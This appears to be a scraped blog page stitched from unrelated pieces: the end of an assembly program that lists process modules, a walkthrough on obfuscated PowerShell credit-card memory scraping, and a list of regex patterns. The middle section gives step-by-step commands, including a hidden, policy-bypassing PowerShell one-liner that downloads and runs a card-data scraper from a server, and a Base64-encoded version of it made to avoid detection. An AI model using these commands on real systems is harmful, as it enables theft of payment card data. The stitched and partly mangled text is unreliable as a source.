    LOCAL buf[260]  :BYTE
    LOCAL txt[260]  :BYTE

    mov pbuf, ptr$(buf)
    mov ptxt, ptr$(txt)

    mov hProcess, rv(OpenProcess,PROCESS_QUERY_INFORMATION or PROCESS_VM_READ,FALSE,pid)
                         
    .if hProcess != 0
      .if rv(EnumProcessModules,hProcess,ADDR hMod,4,ADDR cbNeeded) != 0
        invoke GetModuleBaseName,hProcess,hMod,pbuf,260
        mov ptxt, cat$(ptxt,”pid “,str$(pid),” “,pbuf)
      .else
        mov ptxt, cat$(ptxt,”pid “,str$(pid),” -fail- EnumProcessModules”)
      .endif
    .else
      mov ptxt, cat$(ptxt,”pid “,str$(pid),” -fail- OpenProcess”)
    .endif

    print ptxt,13,10

    invoke CloseHandle,hProcess

    ret

ShowProcess endp

; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

end start

Obfuscated PowerShell Memory Scraping for Credit Cards

Original Source & Inspiration: http://www.shellntel.com/blog/2015/9/16/powershell-cc-memory-scraper

* Non-resident credit card memory scraper, now improved the obfuscation technique using -EncodedCommand
* One-liner PowerShell script/downloader essentially does its dirty work without any additional malware corpus on the host
* Great for penetration tests of various merchants or for PCI-DSS audit compliance

  • ​​(1) Setup a server with the Memory Scraper download
  • (2) Encode the PowerShell memory scraper using -EncodedCommand (Base64)
  • (3) Allow execution of scripts on the host via powershell.exe Set-ExecutionPolicy Unrestricted
  • (4) Execute the obfuscated script on the host​ that downloads the memory scraper and parses the memory process of notepad.exe for credit card Track1/2 data with Luhn algorithm

 -NoP -NonI -W Hidden -Enc 

  • powershell.exe  -exec bypass -NoP -NonI -W Hidden -Enc “KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADkAMwA6ADgAMAAwADAALwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACwAJwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACkAOwAuAC8AbQBlAG0AXwBzAGMAcgBhAHAAZQByAC4AcABzADEAIAAtAFAAcgBvAGMAIABuAG8AdABlAHAAYQBkADsA”
Picture

(1) On the server, set up a lightweight HTTP server

  • copy contents and python -m SimpleHTTPServer

(2) Encode the PowerShell memory scraper using -EncodedCommand (Base64);

Picture

The following PowerShell is going to be encoded using -EncodedCommand instead of -Command:

  • powershell.exe -exec bypass -Command “(New-Object Net.WebClient).DownloadFile(‘http://192.168.0.193:8000/mem_scraper.ps1′,’mem_scraper.ps1′);./mem_scraper.ps1 -Proc notepad;)”

Referencehttps://blogs.msdn.microsoft.com/timid/2014/03/26/powershell-encodedcommand-and-round-trips/

  • EncodedCommand

    Accepts a base-64-encoded string version of a command. Use this parameter
    to submit commands to Windows PowerShell that require complex quotation
    marks or curly braces

​# To use the -EncodedCommand parameter:
    $command = “(New-Object Net.WebClient).DownloadFile(‘http://192.168.0.193:8000/mem_scraper.ps1′,’mem_scraper.ps1′);./mem_scraper.ps1 -Proc notepad;)”
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
    $encodedCommand = [Convert]::ToBase64String($bytes) ”’KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADkAMwA6ADgAMAAwADAALwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACwAJwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACkAOwAuAC8AbQBlAG0AXwBzAGMAcgBhAHAAZQByAC4AcABzADEAIAAtAFAAcgBvAGMAIABuAG8AdABlAHAAYQBkADsA”’ # Base64-Encoded Command
powershell.exe -encodedCommand $encodedCommand # Test

Here is the reverse process:
$decodedCommand = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64));
($command = “New-Object Net.WebClient).DownloadFile(‘http://192.168.0.193:8000/mem_scraper.ps1&#8242;,’mem_scraper.ps1’);./mem_scraper.ps1 -Proc notepad;”$bytes = [System.Text.Encoding]::Unicode.GetBytes($command);$encodedCommand = [Convert]::ToBase64String($bytes);powershell.exe -encodedCommand $encodedCommand)

Picture

The final obfuscated PowerShell one-liner is as follows:

  • powershell.exe -exec bypass -EncodedCommand”KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADkAMwA6ADgAMAAwADAALwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACwAJwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACkAOwAuAC8AbQBlAG0AXwBzAGMAcgBhAHAAZQByAC4AcABzADEAIAAtAFAAcgBvAGMAIABuAG8AdABlAHAAYQBkADsA”​

(3) Allow execution of scripts on the host via powershell.exe Set-ExecutionPolicy Unrestricted
The Set-ExecutionPolicy cmdlet enables you to determine which Windows PowerShell scripts (if any) will be allowed to run on your computer. Windows PowerShell has four different execution policies:

  • Restricted – No scripts can be run. Windows PowerShell can be used only in interactive mode.
  • AllSigned – Only scripts signed by a trusted publisher can be run.
  • RemoteSigned – Downloaded scripts must be signed by a trusted publisher before they can be run.
  • Unrestricted – No restrictions; all Windows PowerShell scripts can be run.

Reference: https://technet.microsoft.com/en-us/library/ee176961.aspx

(4) Execute the obfuscated script on the host​ that downloads the memory scraper and parses the memory process of notepad.exe for credit card Track1/2 data with Luhn algorithm

Picture


Let’s Code: Regular Expressions

Sourcehttp://code.tutsplus.com/tutorials/8-regular-expressions-you-should-know–net-6149

1. Matching a Username
Pattern: /^[a-z0-9_-]{3,16}$/

A. String that matches: my-us3r_n4m3
B. String that doesn’t match: th1s1s-wayt00_l0ngt0beausername (too long)

2. Matching a Password 
Pattern: /^[a-z0-9_-]{6,18}$/

A. String that matches: myp4ssw0rd
B. String that doesn’t match: mypa$$w0rd (contains a dollar sign)

3. Matching a Hex Value
Pattern: /^#?([a-f0-9]{6}|[a-f0-9]{3})$/

A. String that matches: #a3c113B.
B. String that doesn’t match:
#4d82h4 (contains the letter h)

4. Matching a Slug
Pattern: /^[a-z0-9-]+$/

A. String that matches: my-title-here
B. String that doesn’t match:​ my_title_here (contains underscores)

5. Matching an Email
Pattern: /^([a-z0-9_\.-]+)@([\da-z\.-]+)\.([a-z\.]{2,6})$/

A. String that matches:john@doe.com
B. 
String that doesn’t match:
john@doe.something (TLD is too long)

6. Matching a URL
Pattern:/^(https?:\/\/)?([\da-z\.-]+)\.([a-z\.]{2,6})([\/\w \.-]*)*\/?$/

A. String that matches:http://net.tutsplus.com/about
B. String that doesn’t match:http://google.com/some/file!.html (contains an exclamation point)

7. Matching an IP Address
Pattern: /^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/


8. Matching an HTML Tag
Pattern:/^<([a-z]+)([^(.*)|\s+\/>)$/

A. String that matches:Nettuts+
B. String that doesn’t match:” /> (attributes can’t contain greater than signs)